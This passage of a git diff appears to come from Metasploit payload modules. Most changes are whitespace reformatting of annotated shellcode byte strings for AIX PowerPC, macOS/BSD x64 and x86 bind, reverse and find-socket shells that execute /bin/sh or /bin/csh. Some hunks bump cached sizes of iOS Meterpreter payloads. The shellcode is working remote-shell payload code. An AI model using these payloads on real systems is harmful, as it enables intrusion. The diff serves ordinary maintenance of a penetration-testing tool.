"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7f\x25\xcb\x78" + # mr r5,r25 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
|
||||
@cal_kfcntl +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
|
||||
"\x40\x80\xff\xd4" +# bge <fndsockcode+116> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel <fndsockcode+164> #
|
||||
"\x7f\x08\x02\xa6" +# mflr r24 #
|
||||
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
|
||||
"\x40\x80\xff\xd4" + # bge <fndsockcode+116> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel <fndsockcode+164> #
|
||||
"\x7f\x08\x02\xa6" + # mflr r24 #
|
||||
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
@cal_execve +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"/bin/csh"
|
||||
|
||||
# If the payload is generated and there are offsets to substitute,
|
||||
|
|
|
@ -34,18 +34,18 @@ module MetasploitModule
|
|||
super(*args)
|
||||
|
||||
payload =
|
||||
"\x7c\xa5\x2a\x79" +# /* xor. r5,r5,r5 */
|
||||
"\x40\x82\xff\xfd" +# /* bnel <shellcode> */
|
||||
"\x7f\xe8\x02\xa6" +# /* mflr r31 */
|
||||
"\x3b\xff\x01\x20" +# /* cal r31,0x120(r31) */
|
||||
"\x38\x7f\xff\x08" +# /* cal r3,-248(r31) */
|
||||
"\x38\x9f\xff\x10" +# /* cal r4,-240(r31) */
|
||||
"\x90\x7f\xff\x10" +# /* st r3,-240(r31) */
|
||||
"\x90\xbf\xff\x14" +# /* st r5,-236(r31) */
|
||||
"\x88\x5f\xff\x0f" +# /* lbz r2,-241(r31) */
|
||||
"\x98\xbf\xff\x0f" +# /* stb r5,-241(r31) */
|
||||
"\x4c\xc6\x33\x42" +# /* crorc cr6,cr6,cr6 */
|
||||
"\x44\xff\xff\x02" +# /* svca */
|
||||
"\x7c\xa5\x2a\x79" + # /* xor. r5,r5,r5 */
|
||||
"\x40\x82\xff\xfd" + # /* bnel <shellcode> */
|
||||
"\x7f\xe8\x02\xa6" + # /* mflr r31 */
|
||||
"\x3b\xff\x01\x20" + # /* cal r31,0x120(r31) */
|
||||
"\x38\x7f\xff\x08" + # /* cal r3,-248(r31) */
|
||||
"\x38\x9f\xff\x10" + # /* cal r4,-240(r31) */
|
||||
"\x90\x7f\xff\x10" + # /* st r3,-240(r31) */
|
||||
"\x90\xbf\xff\x14" + # /* st r5,-236(r31) */
|
||||
"\x88\x5f\xff\x0f" + # /* lbz r2,-241(r31) */
|
||||
"\x98\xbf\xff\x0f" + # /* stb r5,-241(r31) */
|
||||
"\x4c\xc6\x33\x42" + # /* crorc cr6,cr6,cr6 */
|
||||
"\x44\xff\xff\x02" + # /* svca */
|
||||
"/bin/sh"+
|
||||
"\x05"
|
||||
|
||||
|
|
|
@ -41,55 +41,55 @@ module MetasploitModule
|
|||
super(*args)
|
||||
|
||||
payload =
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel <cntsockcode> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x25" +# cal r30,-475(r30) #
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x20" +# bctr #
|
||||
"\xff\x02\x11\x5c" +# .long 0xff02115c #
|
||||
"\x7f\x00\x00\x01" +# .long 0x7f000001 #
|
||||
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" +# svca 0 #
|
||||
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" +# lil r29,2047 #
|
||||
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
|
||||
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel <cntsockcode> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x25" + # cal r30,-475(r30) #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x20" + # bctr #
|
||||
"\xff\x02\x11\x5c" + # .long 0xff02115c #
|
||||
"\x7f\x00\x00\x01" + # .long 0x7f000001 #
|
||||
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" + # svca 0 #
|
||||
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" + # lil r29,2047 #
|
||||
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
|
||||
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
|
||||
@cal_socket +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
|
||||
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
|
||||
"\x38\x9e\xff\xf8" +# cal r4,-8(r30) #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
|
||||
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
|
||||
"\x38\x9e\xff\xf8" + # cal r4,-8(r30) #
|
||||
@cal_connect +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x3b\x7d\xf8\x03" +# cal r27,-2045(r29) #
|
||||
"\x7f\x63\xdb\x78" +# mr r3,r27 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x3b\x7d\xf8\x03" + # cal r27,-2045(r29) #
|
||||
"\x7f\x63\xdb\x78" + # mr r3,r27 #
|
||||
@cal_close +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\x65\xdb\x78" +# mr r5,r27 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" +# mr r3,r28 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7f\x65\xdb\x78" + # mr r5,r27 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" + # mr r3,r28 #
|
||||
@cal_kfcntl +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x37\x7b\xff\xff" +# ai. r27,r27,-1 #
|
||||
"\x40\x80\xff\xd4" +# bge <cntsockcode+100> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel <cntsockcode+148> #
|
||||
"\x7f\x08\x02\xa6" +# mflr r24 #
|
||||
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x37\x7b\xff\xff" + # ai. r27,r27,-1 #
|
||||
"\x40\x80\xff\xd4" + # bge <cntsockcode+100> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel <cntsockcode+148> #
|
||||
"\x7f\x08\x02\xa6" + # mflr r24 #
|
||||
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
@cal_execve +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"/bin/csh"
|
||||
|
||||
# If the payload is generated and there are offsets to substitute,
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 692904
|
||||
CachedSize = 692988
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 692904
|
||||
CachedSize = 692988
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 692904
|
||||
CachedSize = 692988
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -33,52 +33,52 @@ module MetasploitModule
|
|||
'LPORT' => [ 20, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
"\x58" +# pop %rax #
|
||||
"\x99" +# cltd #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
"\x5f" +# pop %rdi #
|
||||
"\x6a\x01" +# pushq $0x1 #
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x97" +# xchg %rax,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x52" +# push %rdx #
|
||||
"\x52" +# push %rdx #
|
||||
"\xba\x00\x1c\x11\x5C" +# mov edx,0x5c111c00 #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x04\x4c" +# add $0x4c,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x31\xf6" +# xor %rsi,%rsi #
|
||||
"\x6a\x6a" +# pushq $0x6a #
|
||||
"\x58" +# pop %rax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x99" +# cltd #
|
||||
"\x04\x1e" +# add $0x1e,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x89\xc7" +# mov %rax,%rdi #
|
||||
"\x6a\x5a" +# pushq $0x5a #
|
||||
"\x58" +# pop %rax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x5a" +# add $0x5a,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x59" +# add $0x59,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe7" +# mov %rsp,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x04\x39" +# add $0x39,%al #
|
||||
"\x0f\x05" # syscall #
|
||||
"\x6a\x61" + # pushq $0x61 #
|
||||
"\x58" + # pop %rax #
|
||||
"\x99" + # cltd #
|
||||
"\x6a\x1c" + # pushq $0x1c #
|
||||
"\x5f" + # pop %rdi #
|
||||
"\x6a\x01" + # pushq $0x1 #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x97" + # xchg %rax,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x52" + # push %rdx #
|
||||
"\x52" + # push %rdx #
|
||||
"\xba\x00\x1c\x11\x5C" + # mov edx,0x5c111c00 #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x6a\x1c" + # pushq $0x1c #
|
||||
"\x5a" + # pop %rdx #
|
||||
"\x04\x4c" + # add $0x4c,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x31\xf6" + # xor %rsi,%rsi #
|
||||
"\x6a\x6a" + # pushq $0x6a #
|
||||
"\x58" + # pop %rax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x99" + # cltd #
|
||||
"\x04\x1e" + # add $0x1e,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x89\xc7" + # mov %rax,%rdi #
|
||||
"\x6a\x5a" + # pushq $0x5a #
|
||||
"\x58" + # pop %rax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x5a" + # add $0x5a,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x59" + # add $0x59,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" + # mov "in/sh",%rdi #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe7" + # mov %rsp,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x04\x39" + # add $0x39,%al #
|
||||
"\x0f\x05" # syscall #
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -33,50 +33,50 @@ module MetasploitModule
|
|||
'LPORT' => [ 18, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
"\x58" +# pop %rax #
|
||||
"\x99" +# cltd #
|
||||
"\x6a\x02" +# pushq $0x2 #
|
||||
"\x5f" +# pop %rdi #
|
||||
"\x6a\x01" +# pushq $0x1 #
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x97" +# xchg %rax,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x6a\x10" +# pushq $0x10 #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x04\x66" +# add $0x66,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x31\xf6" +# xor %rsi,%rsi #
|
||||
"\x6a\x6a" +# pushq $0x6a #
|
||||
"\x58" +# pop %rax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x99" +# cltd #
|
||||
"\x04\x1e" +# add $0x1e,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x89\xc7" +# mov %rax,%rdi #
|
||||
"\x6a\x5a" +# pushq $0x5a #
|
||||
"\x58" +# pop %rax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x5a" +# add $0x5a,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x59" +# add $0x59,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbf\x2f\x2f" +# mov "//" #
|
||||
"\x62\x69\x6e\x2f" +# "bin/sh" #
|
||||
"\x73\x68" +# mov $0x68732f6e69622f2f,%rdi #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe7" +# mov %rsp,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x04\x39" +# add $0x39,%al #
|
||||
"\x6a\x61" + # pushq $0x61 #
|
||||
"\x58" + # pop %rax #
|
||||
"\x99" + # cltd #
|
||||
"\x6a\x02" + # pushq $0x2 #
|
||||
"\x5f" + # pop %rdi #
|
||||
"\x6a\x01" + # pushq $0x1 #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x97" + # xchg %rax,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\xba\x00\x02\x11\x5C" + # mov edx,0x5c110200 #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x6a\x10" + # pushq $0x10 #
|
||||
"\x5a" + # pop %rdx #
|
||||
"\x04\x66" + # add $0x66,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x31\xf6" + # xor %rsi,%rsi #
|
||||
"\x6a\x6a" + # pushq $0x6a #
|
||||
"\x58" + # pop %rax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x99" + # cltd #
|
||||
"\x04\x1e" + # add $0x1e,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x89\xc7" + # mov %rax,%rdi #
|
||||
"\x6a\x5a" + # pushq $0x5a #
|
||||
"\x58" + # pop %rax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x5a" + # add $0x5a,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x59" + # add $0x59,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbf\x2f\x2f" + # mov "//" #
|
||||
"\x62\x69\x6e\x2f" + # "bin/sh" #
|
||||
"\x73\x68" + # mov $0x68732f6e69622f2f,%rdi #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe7" + # mov %rsp,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x04\x39" + # add $0x39,%al #
|
||||
"\x0f\x05" # syscall #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -35,51 +35,51 @@ module MetasploitModule
|
|||
'SCOPEID' => [ 101, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
"\x58" +# pop %rax #
|
||||
"\x99" +# cltd #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
"\x5f" +# pop %rdi #
|
||||
"\x6a\x01" +# pushq $0x1 #
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x97" +# xchg %rax,%rdi #
|
||||
"\x04\x3e" +# add $0x3e,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x59" +# add $0x59,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xce" +# dec %esi #
|
||||
"\xff\xce" +# dec %esi #
|
||||
"\x04\x58" +# add $0x58,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
|
||||
"\x6a\x61" + # pushq $0x61 #
|
||||
"\x58" + # pop %rax #
|
||||
"\x99" + # cltd #
|
||||
"\x6a\x1c" + # pushq $0x1c #
|
||||
"\x5f" + # pop %rdi #
|
||||
"\x6a\x01" + # pushq $0x1 #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x97" + # xchg %rax,%rdi #
|
||||
"\x04\x3e" + # add $0x3e,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x59" + # add $0x59,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xce" + # dec %esi #
|
||||
"\xff\xce" + # dec %esi #
|
||||
"\x04\x58" + # add $0x58,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xe9\x23\x00\x00\x00" + # jmpq <forth> #
|
||||
# back:
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x66\x83\xc0\x62" +# add $0x62,%ax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x99" +# cltd #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" +# "in/sh",%rdi #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe7" +# mov %rsp,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x04\x3b" +# add $0x3b,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x6a\x1c" + # pushq $0x1c #
|
||||
"\x5a" + # pop %rdx #
|
||||
"\x66\x83\xc0\x62" + # add $0x62,%ax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x99" + # cltd #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" + # "in/sh",%rdi #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe7" + # mov %rsp,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x04\x3b" + # add $0x3b,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
# forth:
|
||||
"\xe8\xd8\xff\xff\xff" +# callq <back> #
|
||||
"\xe8\xd8\xff\xff\xff" + # callq <back> #
|
||||
# sockaddr_in6
|
||||
"\x00\x1c\x11\x5c" +# AF_INET6+port #
|
||||
"\x00\x00\x00\x00" +# no-one-cares #
|
||||
"\x00\x00\x00\x00" +# IPv6- #
|
||||
"\x00\x00\x00\x00" +# addr- #
|
||||
"\x00\x00\x00\x00" +# in- #
|
||||
"\x00\x00\x00\x01" +# 16 bytes #
|
||||
"\x00\x1c\x11\x5c" + # AF_INET6+port #
|
||||
"\x00\x00\x00\x00" + # no-one-cares #
|
||||
"\x00\x00\x00\x00" + # IPv6- #
|
||||
"\x00\x00\x00\x00" + # addr- #
|
||||
"\x00\x00\x00\x00" + # in- #
|
||||
"\x00\x00\x00\x01" + # 16 bytes #
|
||||
"\x00\x00\x00\x00" # Scope ID #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -34,43 +34,43 @@ module MetasploitModule
|
|||
'LPORT' => [ 37, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
"\x58" +# pop %rax #
|
||||
"\x99" +# cltd #
|
||||
"\x6a\x02" +# pushq $0x2 #
|
||||
"\x5f" +# pop %rdi #
|
||||
"\x6a\x01" +# pushq $0x1 #
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x97" +# xchg %rax,%rdi #
|
||||
"\x04\x58" +# add $0x58,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x59" +# add $0x59,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xce" +# dec %esi #
|
||||
"\xff\xce" +# dec %esi #
|
||||
"\x04\x58" +# add $0x58,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbb\x00\x02\x11" +# mov ... #
|
||||
"\x5c\x7f\x00\x00\x01" +# mov $0x100007f5c110200,%rbx #
|
||||
"\x53" +# push %rbx #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x6a\x10" +# pushq $0x10 #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x66\x83\xc0\x62" +# add $0x62,%ax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x99" +# cltd #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" +# "in/sh", %rdi #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe7" +# mov %rsp,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x04\x3b" +# add $0x3b,%al #
|
||||
"\x6a\x61" + # pushq $0x61 #
|
||||
"\x58" + # pop %rax #
|
||||
"\x99" + # cltd #
|
||||
"\x6a\x02" + # pushq $0x2 #
|
||||
"\x5f" + # pop %rdi #
|
||||
"\x6a\x01" + # pushq $0x1 #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x97" + # xchg %rax,%rdi #
|
||||
"\x04\x58" + # add $0x58,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x59" + # add $0x59,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xce" + # dec %esi #
|
||||
"\xff\xce" + # dec %esi #
|
||||
"\x04\x58" + # add $0x58,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbb\x00\x02\x11" + # mov ... #
|
||||
"\x5c\x7f\x00\x00\x01" + # mov $0x100007f5c110200,%rbx #
|
||||
"\x53" + # push %rbx #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x6a\x10" + # pushq $0x10 #
|
||||
"\x5a" + # pop %rdx #
|
||||
"\x66\x83\xc0\x62" + # add $0x62,%ax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x99" + # cltd #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" + # "in/sh", %rdi #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe7" + # mov %rsp,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x04\x3b" + # add $0x3b,%al #
|
||||
"\x0f\x05" # syscall #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,43 +32,43 @@ module MetasploitModule
|
|||
'LPORT' => [ 6, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
|
||||
"\x89\xe7" +# movl %esp,%edi #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x01" +# pushl $0x01 #
|
||||
"\x6a\x02" +# pushl $0x02 #
|
||||
"\x6a\x10" +# pushl $0x10 #
|
||||
"\xb0\x61" +# movb $0x61,%al #
|
||||
